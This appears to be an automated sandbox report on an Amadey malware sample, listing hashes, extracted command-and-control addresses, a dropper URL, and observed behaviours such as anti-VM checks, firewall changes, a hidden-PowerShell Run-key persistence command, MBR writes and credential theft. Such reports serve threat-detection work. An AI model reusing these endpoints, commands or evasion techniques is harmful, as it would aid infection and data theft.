amadey | c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f

Analysis

max time kernel
140s
max time network
154s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
31-05-2024 22:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
Size

1.8MB
MD5

d90dc86c07c652736ef253bda10ebdb7
SHA1

8f00555f5f07d01fa443b8cd192d526aea6657d2
SHA256

c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f
SHA512

b5305f4153b972f4e82752fabfe40795154f7ec85a67d70d27839b47299020362a2ff51287c516895ef0690ca791ac1e6ac5e8c06ace34a71876a054aa23611a
SSDEEP

49152:QPlMGxzd7loa9wnz25tRb4zDbPIY3RjtIspMYGzL:QPlMIoa9az2tb4zwYBj6Ye

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://94.103.188.126/jerry/putty.zip

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

http://147.45.47.155

Attributes

install_dir
9217037dc9
install_file
explortu.exe
strings_key
8e894a8a4a3d0da8924003a561cfb244
url_paths
/ku4Nor9/index.php

rc4.plain

Extracted

Family

amadey

Version

4.21

Botnet

49e482

http://147.45.47.70

Attributes

install_dir
1b29d73536
install_file
axplont.exe
strings_key
4d31dd1a190d9879c21fac6d87dc0043
url_paths
/tr8nomy/index.php

rc4.plain

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:40960

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

stealc

Botnet

zzvv

http://23.88.106.134

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

Fresh

pepecasas123.net:4608

Mutex

AsyncMutex_5952

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

Fresh run

pepecasas123.net:4609

Mutex

AsyncMutex_2952

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	T3cNLr3g0Ri4J7he61UN0lW3.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral2/files/0x000100000002a9e6-95.dat	family_redline
behavioral2/memory/3016-104-0x0000000000CB0000-0x0000000000D02000-memory.dmp	family_redline
behavioral2/files/0x000100000002a9e3-160.dat	family_redline
behavioral2/memory/4236-174-0x0000000000A00000-0x0000000000A52000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2612 created 3304	2612	Cruz.pif	52
PID 2612 created 3304	2612	Cruz.pif	52

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/3340-6411-0x0000000002290000-0x00000000022A6000-memory.dmp	family_asyncrat

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7ec52fcc46.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6b4e5c58ea.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
113	3340	powershell.exe
115	3340	powershell.exe
115	3340	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2420	powershell.exe
5196	powershell.exe
1664	powershell.exe
2808	powershell.exe
3912	powershell.exe
3912	powershell.exe
3760	powershell.exe
3340	powershell.exe
5432	powershell.EXE

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5728	netsh.exe
5372	netsh.exe

Checks BIOS information in registry 2 TTPs 19 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7ec52fcc46.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6b4e5c58ea.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7ec52fcc46.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6b4e5c58ea.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe

Executes dropped EXE 37 IoCs

pid	Process
1152	explortu.exe
3572	7ec52fcc46.exe
4028	axplont.exe
3716	33333.exe
4692	One.exe
3016	svhoost.exe
916	6b4e5c58ea.exe
4236	fileosn.exe
1240	lumma1234.exe
3548	gold.exe
4084	axplont.exe
1576	explortu.exe
3836	swizzzz.exe
4404	file300un.exe
2376	Newoff.exe
432	360TS_Setup_Mini_WW.exe
4500	4TS3Fy6BMMUZF4kDjwSDYcZ6.exe
5052	wg2sDWUI4FJX9WOCZzfaJ2SE.exe
1832	a7YGq3H0uFjl3y1aChNJg5jL.exe
1600	T3cNLr3g0Ri4J7he61UN0lW3.exe
3968	hn3O0pnsWX4honw7kWK1yFIQ.exe
2612	Cruz.pif
1712	Install.exe
2956	buildjudit.exe
5072	Install.exe
980	stub.exe
3172	smartsoftsignew.exe
3376	volumeinfo.exe
5648	Install.exe
5200	putty.exe
5708	axplont.exe
5372	explortu.exe
2176	Newoff.exe
1728	Cruz.pif
3040	AyYkgDF.exe
3684	volumeinfo.exe
4388	Cruz.pif

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	7ec52fcc46.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	6b4e5c58ea.exe
Key opened	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Wine	explortu.exe

Loads dropped DLL 35 IoCs

pid	Process
432	360TS_Setup_Mini_WW.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
980	stub.exe
3172	smartsoftsignew.exe
3172	smartsoftsignew.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Windows\CurrentVersion\Run\6b4e5c58ea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\6b4e5c58ea.exe"	explortu.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1000043001\\volumeinfo.exe'\""	volumeinfo.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	AyYkgDF.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
52	pastebin.com
73	iplogger.com
78	raw.githubusercontent.com
85	iplogger.com
25	iplogger.com
42	iplogger.com
43	pastebin.com
43	raw.githubusercontent.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
41	api.myip.com
41	ip-api.com
70	api.myip.com
71	ipinfo.io
25	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	360TS_Setup_Mini_WW.exe

Drops file in System32 directory 30 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	AyYkgDF.exe
File opened for modification	C:\Windows\System32\GroupPolicy	T3cNLr3g0Ri4J7he61UN0lW3.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	T3cNLr3g0Ri4J7he61UN0lW3.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	T3cNLr3g0Ri4J7he61UN0lW3.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	AyYkgDF.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	AyYkgDF.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F	AyYkgDF.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	T3cNLr3g0Ri4J7he61UN0lW3.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	AyYkgDF.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	AyYkgDF.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
4748	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
1152	explortu.exe
3572	7ec52fcc46.exe
4028	axplont.exe
916	6b4e5c58ea.exe
4084	axplont.exe
1576	explortu.exe
5708	axplont.exe
5372	explortu.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3716 set thread context of 4700	3716	33333.exe	83
PID 1240 set thread context of 2676	1240	lumma1234.exe	98
PID 3548 set thread context of 3296	3548	gold.exe	103
PID 3836 set thread context of 1076	3836	swizzzz.exe	107
PID 4404 set thread context of 1868	4404	file300un.exe	120
PID 1832 set thread context of 2152	1832	a7YGq3H0uFjl3y1aChNJg5jL.exe	136
PID 2612 set thread context of 4388	2612	Cruz.pif	374
PID 3376 set thread context of 3684	3376	volumeinfo.exe	384

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\hsUwQAlMU\BRLoOE.dll	AyYkgDF.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	AyYkgDF.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	AyYkgDF.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	AyYkgDF.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	AyYkgDF.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	AyYkgDF.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explortu.job	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
File created	C:\Windows\Tasks\axplont.job	7ec52fcc46.exe
File created	C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job	schtasks.exe
File created	C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job	schtasks.exe
File created	C:\Windows\Tasks\ucrVpivlTlXwlAC.job	schtasks.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5280	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
1776	3716	WerFault.exe	81
2560	3548	WerFault.exe	99
2492	5648	WerFault.exe	252
920	5072	WerFault.exe	155
5596	3040	WerFault.exe	381

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
1616	WMIC.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1664	schtasks.exe
4884	schtasks.exe
5348	schtasks.exe
1572	schtasks.exe
2820	schtasks.exe
5064	schtasks.exe
3128	schtasks.exe
2920	schtasks.exe
6120	schtasks.exe
5876	schtasks.exe
2844	schtasks.exe
5992	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3484	timeout.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
3624	tasklist.exe
3516	tasklist.exe
4000	tasklist.exe
2308	tasklist.exe
3288	tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1936	ipconfig.exe
5412	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2420	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2656	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{453a990c-0000-0000-0000-d01200000000}	AyYkgDF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936320200006024b221ea3a6910a2dc08002b30309d1d030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936320200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Install.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
